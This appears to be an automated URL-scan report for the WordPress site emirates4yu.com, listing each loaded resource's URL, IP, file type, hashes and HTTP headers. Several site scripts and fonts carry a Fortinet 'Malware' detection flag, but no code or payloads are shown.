emirates4yu.com/wp-content/uploads/2018/12/bg-2-e1545337371901.jpg
35.190.203.220 200 OK 126 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2018/12/bg-2-e1545337371901.jpg
IP 35.190.203.220:0
File type JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 2000x475, components 3
Size 126 kB (125546 bytes)
Hash c6da188f314f9ad58870303a9267c62d
bfda034a4cbde45fdcaa3ccd8ec2b97d9ad1792b
a59e71bcb8c8d5ee61050d4c95732d095efa43d3ae2ab62f4316227eb8308237
GET /wp-content/uploads/2018/12/bg-2-e1545337371901.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/wp-content/uploads/bb-plugin/cache/1735-layout.css?ver=f0a77558ad3f599b1fa355fe811a730e
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 125546
last-modified: Thu, 20 Dec 2018 20:22:51 GMT
etag: "5c1bfa1b-1ea6a"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/bb-plugin/icons/ultimate-icons/fonts/Ultimate-Icons.ttf?1ddi1j
35.190.203.220 200 OK 93 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/bb-plugin/icons/ultimate-icons/fonts/Ultimate-Icons.ttf?1ddi1j
IP 35.190.203.220:0
File type TrueType Font data, 11 tables, 1st "OS/2", 14 names, Macintosh, type 1 string, Ultimate-Icons
Hash 4f52acd8464d9611fe731e6182f1986e
a6367a5d19bd2b65265eee57e03068dca24be313
49f204eb11dd2940cb55d01fbe8f8f2fef9167ff1cb6e22bcecde06c0078f630
Analyzer Verdict Alert fortinet Malware
GET /wp-content/uploads/bb-plugin/icons/ultimate-icons/fonts/Ultimate-Icons.ttf?1ddi1j HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/wp-content/uploads/bb-plugin/icons/ultimate-icons/style.css?ver=2.2.6.3
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/octet-stream
content-length: 93024
last-modified: Sat, 01 Dec 2018 21:38:27 GMT
etag: "5c02ff53-16b60"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash 87de3dd2c7dce12b01a337d1554a222a
30e0bd68bbb78995aa8a0686ac02848fd5a7a699
533c21806ef66401ea5faeeb37366a33f19f0e9052b4fb06f22981ec73b21a59
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
emirates4yu.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.6.7
35.190.203.220 200 OK 24 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.6.7
IP 35.190.203.220:0
File type ASCII text, with very long lines (1472), with no line terminators
Hash 87c249bf15a90d1d241789d0eb653e5d
591c2b0b8722bd758154a14ce783058c7cfe9d8e
3afd99ef85be749b3913cb1fb6bf91cf0ecec0c7f7757a06b2abc5e2dc1b91be
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.6.7 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 11 Mar 2022 00:15:40 GMT
etag: W/"622a94ac-5c0"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wXg.woff2
216.58.207.195 200 OK 24 kB URL HTTP/2 fonts.gstatic.com/s/lato/v23/S6uyw4BMUTPHjx4wXg.woff2
IP 216.58.207.195:0
File type Web Open Font Format (Version 2), TrueType, length 23580, version 1.0
Hash e1b3b5908c9cf23dfb2b9c52b9a023ab
fcd4136085f2a03481d9958cc6793a5ed98e714c
918b7dc3e2e2d015c16ce08b57bcb64d2253bafc1707658f361e72865498e537
GET /s/lato/v23/S6uyw4BMUTPHjx4wXg.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://emirates4yu.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 23580
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Tue, 22 Nov 2022 17:10:21 GMT
expires: Wed, 22 Nov 2023 17:10:21 GMT
cache-control: public, max-age=31536000
age: 240699
last-modified: Tue, 26 Apr 2022 15:48:56 GMT
content-type: font/woff2
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
www.googletagmanager.com/gtm.js?id=GTM-NVX2RP2
142.250.74.168 200 OK 57 kB URL HTTP/2 www.googletagmanager.com/gtm.js?id=GTM-NVX2RP2
IP 142.250.74.168:0
File type ASCII text, with very long lines (1921)
Hash 159a1b731e629b9083ca1afe14ffe6ad
ce62126b030dfec0d453b12333eb3c31f1836f93
ef569492e1d509fafa11f62e8e9a2279257dba6c7b3b050eec9460b850b4d429
GET /gtm.js?id=GTM-NVX2RP2 HTTP/1.1
Host: www.googletagmanager.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
content-type: application/javascript; charset=UTF-8
access-control-allow-origin: *
access-control-allow-credentials: true
access-control-allow-headers: Cache-Control
content-encoding: br
vary: Accept-Encoding
date: Fri, 25 Nov 2022 12:02:00 GMT
expires: Fri, 25 Nov 2022 12:02:00 GMT
cache-control: private, max-age=900
strict-transport-security: max-age=31536000; includeSubDomains
cross-origin-resource-policy: cross-origin
server: Google Tag Manager
content-length: 57292
x-xss-protection: 0
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/bb-ultimate-addon/assets/js/global-scripts/jquery-carousel.js?ver=6.0.3
35.190.203.220 200 OK 82 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/bb-ultimate-addon/assets/js/global-scripts/jquery-carousel.js?ver=6.0.3
IP 35.190.203.220:0
File type ASCII text, with CRLF line terminators
Hash 59e1df5c4bebfd0ab672e4f2dbf72325
63e33c2943515341bad82b1a538cdf8c13d85b05
b4c031b94dcc30746727125276309f831aeccf4861f7e300ef77493c6f976182
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/bb-ultimate-addon/assets/js/global-scripts/jquery-carousel.js?ver=6.0.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Sat, 01 Dec 2018 21:30:58 GMT
etag: W/"5c02fd92-1549f"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2018/12/Emirates4you.png
35.190.203.220 200 OK 30 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2018/12/Emirates4you.png
IP 35.190.203.220:0
File type PNG image data, 600 x 253, 8-bit/color RGBA, interlaced
Hash b88bc0549f394221c658edcc7581291f
9cb4bb86f3d8bebd73a08f38f80c38dfe15a7557
63b882af4fdfe6841829ed234e846a90705d804882227f06b27e33c9fd283551
GET /wp-content/uploads/2018/12/Emirates4you.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Cookie: tk_or=%22%22; tk_r3d=%22%22; tk_lr=%22%22
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 29711
last-modified: Wed, 19 Dec 2018 12:12:29 GMT
etag: "5c1a35ad-740f"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
ocsp.pki.goog/gts1c3
142.250.74.3200 OK 472 B IP 142.250.74.3:0
Hash 87de3dd2c7dce12b01a337d1554a222a
30e0bd68bbb78995aa8a0686ac02848fd5a7a699
533c21806ef66401ea5faeeb37366a33f19f0e9052b4fb06f22981ec73b21a59
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
ocsp.pki.goog/gts1c3
142.250.74.3 200 OK 472 B IP 142.250.74.3:0
Hash a0111a2443450172e5d2b48d350a8f57
75e89d4cd001303e66a93880f96d6c47e7d665ab
c9865c82b8f373aeb3a7333b0f65408211d832aba753c35d3544ecb2913f4f64
POST /gts1c3 HTTP/1.1
Host: ocsp.pki.goog
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Date: Fri, 25 Nov 2022 12:02:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
emirates4yu.com/fr/
35.190.203.220 200 OK 29 kB IP 35.190.203.220:0
File type HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (12468), with CRLF, LF line terminators
Hash 8db749956916588e6e83f4ea43f729ef
42f372285140cf41eaabe115036be7c9e00c2d3b
459831ffe67c4b8afd44f60aa41b4fc93c42eadc12bdbfa5f286218f44c795ca
Analyzer Verdict Alert fortinet Malware
GET /fr/ HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:01:59 GMT
content-type: text/html; charset=UTF-8
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding,Cookie
link: <https://emirates4yu.com/wp-json/>; rel="https://api.w.org/", <https://emirates4yu.com/wp-json/wp/v2/pages/1735>; rel="alternate"; type="application/json", <https://wp.me/P8vXBD-rZ>; rel=shortlink
x-powered-by: WP Engine
x-cacheable: SHORT
cache-control: max-age=600, must-revalidate
x-cache: HIT: 1
x-cache-group: normal
content-encoding: br
X-Firefox-Spdy: h2
fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh50XSwiPGQ.woff2
216.58.207.195 200 OK 22 kB URL HTTP/2 fonts.gstatic.com/s/lato/v23/S6u9w4BMUTPHh50XSwiPGQ.woff2
IP 216.58.207.195:0
File type Web Open Font Format (Version 2), TrueType, length 22504, version 1.0\012- data
Hash 1c6c65523675abc6fcd78e804325bd77
898d9808304dc157f5dcb18ca169ec6e2b96b3d7
08664859baab5ed98f0bf818ed77e38464ff1826dc6406d5ecbd651409afbd92
GET /s/lato/v23/S6u9w4BMUTPHh50XSwiPGQ.woff2 HTTP/1.1
Host: fonts.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://emirates4yu.com
Connection: keep-alive
Referer: https://fonts.googleapis.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers
HTTP/2 200 OK
accept-ranges: bytes
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/apps-themes
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin; report-to="apps-themes"
report-to: {"group":"apps-themes","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/apps-themes"}]}
timing-allow-origin: *
content-length: 22504
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Tue, 22 Nov 2022 17:15:33 GMT
expires: Wed, 22 Nov 2023 17:15:33 GMT
cache-control: public, max-age=31536000
age: 240387
last-modified: Tue, 26 Apr 2022 16:04:16 GMT
content-type: font/woff2
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/js/jquery.magnificpopup.min.js?ver=2.2.6.3
35.190.203.220 200 OK 310 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/js/jquery.magnificpopup.min.js?ver=2.2.6.3
IP 35.190.203.220:0
File type ASCII text, with very long lines (20154), with no line terminators
Size 310 kB (310281 bytes)
Hash dd03b63cde85668340d1aa364f239903
076f855893c9dfb1772acf8e92008672e4759b43
1b3f72af7e579f0e8af1a163709512cfd7fafbe32a4dc868b1bc5c0ee3c61321
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/beaver-builder-lite-version/js/jquery.magnificpopup.min.js?ver=2.2.6.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 20 Dec 2019 16:26:21 GMT
etag: W/"5dfcf62d-4eba"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2018/12/The-Great-Eight-Top-Tips-For.jpg
35.190.203.220 200 OK 49 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2018/12/The-Great-Eight-Top-Tips-For.jpg
IP 35.190.203.220:0
File type JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1140x641, components 3\012- data
Hash 0b70c96b989f3c36cef75200f6d0016d
6893a60aa51eb097c025be28861fbf3a608e39f2
372b07e19dec813220d986a892827a961c4c519cb38bb982e9cbff0639af6ca0
GET /wp-content/uploads/2018/12/The-Great-Eight-Top-Tips-For.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/wp-content/uploads/bb-plugin/cache/1735-layout.css?ver=f0a77558ad3f599b1fa355fe811a730e
Cookie: tk_or=%22%22; tk_r3d=%22%22; tk_lr=%22%22
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 48927
last-modified: Tue, 18 Dec 2018 12:11:15 GMT
etag: "5c18e3e3-bf1f"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/webfonts/fa-solid-900.woff2
35.190.203.220 200 OK 75 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/webfonts/fa-solid-900.woff2
IP 35.190.203.220:0
File type Web Open Font Format (Version 2), TrueType, length 75440, version 329.-1049\012- data
Hash b5cf8ae26748570d8fb95a47f46b69e1
07bed153d47f9129a944ee54dd72952deed074c8
cd398be1a91817126cef10224738e624358edf6f08043abad7e60c1aaeccc8d0
Analyzer Verdict Alert fortinet Malware
GET /wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/webfonts/fa-solid-900.woff2 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Connection: keep-alive
Referer: https://emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/fonts/fontawesome/css/all.min.css?ver=2.2.6.3
Cookie: tk_or=%22%22; tk_r3d=%22%22; tk_lr=%22%22
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: font/woff2
content-length: 75440
last-modified: Fri, 20 Dec 2019 16:26:21 GMT
etag: "5dfcf62d-126b0"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2018/12/ventures_01.jpg
35.190.203.220 200 OK 26 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2018/12/ventures_01.jpg
IP 35.190.203.220:0
File type ISO Media, AVIF Image\012- data
Hash 51dbe7d55c68416b380b5e3c73a9e790
2981352d7e383d40788ae67ef11646d794ad2ae2
e27486ae2f84b621995b70a136c12d569521cd78786a6d252acccf156dce6449
GET /wp-content/uploads/2018/12/ventures_01.jpg HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/wp-content/uploads/bb-plugin/cache/1735-layout.css?ver=f0a77558ad3f599b1fa355fe811a730e
Cookie: tk_or=%22%22; tk_r3d=%22%22; tk_lr=%22%22
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/jpeg
content-length: 174143
last-modified: Sun, 09 Dec 2018 11:25:09 GMT
etag: "5c0cfb95-2a83f"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
www.gstatic.com/recaptcha/releases/Km9gKuG06He-isPsP6saG8cn/recaptcha__en.js
142.250.74.163 200 OK 163 kB URL HTTP/2 www.gstatic.com/recaptcha/releases/Km9gKuG06He-isPsP6saG8cn/recaptcha__en.js
IP 142.250.74.163:0
File type ASCII text, with very long lines (730)
Size 163 kB (162976 bytes)
Hash 79d18cf4265108d7cecca1bf4ada6109
e51d0285a545381d4c39e9e0292a650ffeeecbb9
59ce7253f371df0833c3f72d4748ef812002b90a49413c56d0ca7c40bb5a0ab6
GET /recaptcha/releases/Km9gKuG06He-isPsP6saG8cn/recaptcha__en.js HTTP/1.1
Host: www.gstatic.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: https://emirates4yu.com
Connection: keep-alive
Referer: https://emirates4yu.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
HTTP/2 200 OK
accept-ranges: bytes
vary: Accept-Encoding
content-encoding: gzip
access-control-allow-origin: *
content-security-policy-report-only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/recaptcha
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups; report-to="recaptcha"
report-to: {"group":"recaptcha","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/recaptcha"}]}
content-length: 162976
x-content-type-options: nosniff
server: sffe
x-xss-protection: 0
date: Fri, 25 Nov 2022 08:12:22 GMT
expires: Sat, 25 Nov 2023 08:12:22 GMT
cache-control: public, max-age=31536000
last-modified: Mon, 14 Nov 2022 03:01:59 GMT
content-type: text/javascript
age: 13778
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/js/jquery.waypoints.min.js?ver=2.2.6.3
35.190.203.220 200 OK 31 kB URL HTTP/2 emirates4yu.com/wp-content/plugins/beaver-builder-lite-version/js/jquery.waypoints.min.js?ver=2.2.6.3
IP 35.190.203.220:0
File type Unicode text, UTF-8 text, with very long lines (8668)
Hash 1a79d9d0b6f097ff4e4a7780df68afe9
5114d24f9feb4e6625aae274f0221ce7a31ca93f
6fc62f391138e892978a4f2438bbd81f4c282974c5ab38dc26000a0040026943
GET /wp-content/plugins/beaver-builder-lite-version/js/jquery.waypoints.min.js?ver=2.2.6.3 HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: application/javascript
vary: Accept-Encoding, Accept-Encoding, Accept-Encoding, Accept-Encoding
last-modified: Fri, 20 Dec 2019 16:26:21 GMT
etag: W/"5dfcf62d-2281"
cache-control: public, max-age=31536000
access-control-allow-origin: *
content-encoding: br
X-Firefox-Spdy: h2
emirates4yu.com/wp-content/uploads/2016/02/cropped-logo_golden-repl-32x32.png
35.190.203.220 200 OK 1.6 kB URL HTTP/2 emirates4yu.com/wp-content/uploads/2016/02/cropped-logo_golden-repl-32x32.png
IP 35.190.203.220:0
File type PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced\012- data
Hash b3c6a000a2761fbff2827857b203e5ec
ccf7df9b5d2b93b902cccde303774ba8ba500d37
cd0f5d0e79a3f33bb8bec8ea5240c2f53a212d649eeaa93dce95b9808584d366
GET /wp-content/uploads/2016/02/cropped-logo_golden-repl-32x32.png HTTP/1.1
Host: emirates4yu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://emirates4yu.com/fr/
Cookie: tk_or=%22%22; tk_r3d=%22%22; tk_lr=%22%22; pll_language=fr
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers
HTTP/2 200 OK
server: nginx
date: Fri, 25 Nov 2022 12:02:00 GMT
content-type: image/png
content-length: 1576
last-modified: Thu, 05 Oct 2017 11:37:14 GMT
etag: "59d6196a-628"
cache-control: public, max-age=31536000
vary: Accept-Encoding
access-control-allow-origin: *
accept-ranges: bytes
X-Firefox-Spdy: h2
pixel.wp.com/g.gif?v=ext&j=1%3A9.0.3&blog=125827985&post=1735&tz=5.5&srv=emirates4yu.com&host=emirates4yu.com&ref=&fcp=1375&rand=0.1830355921792789
192.0.76.3 200 OK 50 B URL HTTP/2 pixel.wp.com/g.gif?v=ext&j=1%3A9.0.3&blog=125827985&post=1735&tz=5.5&srv=emirates4yu.com&host=emirates4yu.com&ref=&fcp=1375&rand=0.1830355921792789
IP 192.0.76.3:0
File type GIF image data, version 89a, 6 x 5\012- data
Hash e4d673a55c5656f19ef81563fb10884c
1f2d8ed221d39329251ad3a6ff1edb20b7219443
f3a8992acb9ab911e0fa4ae12f4b85ef8e61008619f13ee51c7a121ff87f63b1
GET /g.gif?v=ext&j=1%3A9.0.3&blog=125827985&post=1735&tz=5.5&srv=emirates4yu.com&host=emirates4yu.com&ref=&fcp=1375&rand=0.1830355921792789 HTTP/1.1
Host: pixel.wp.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
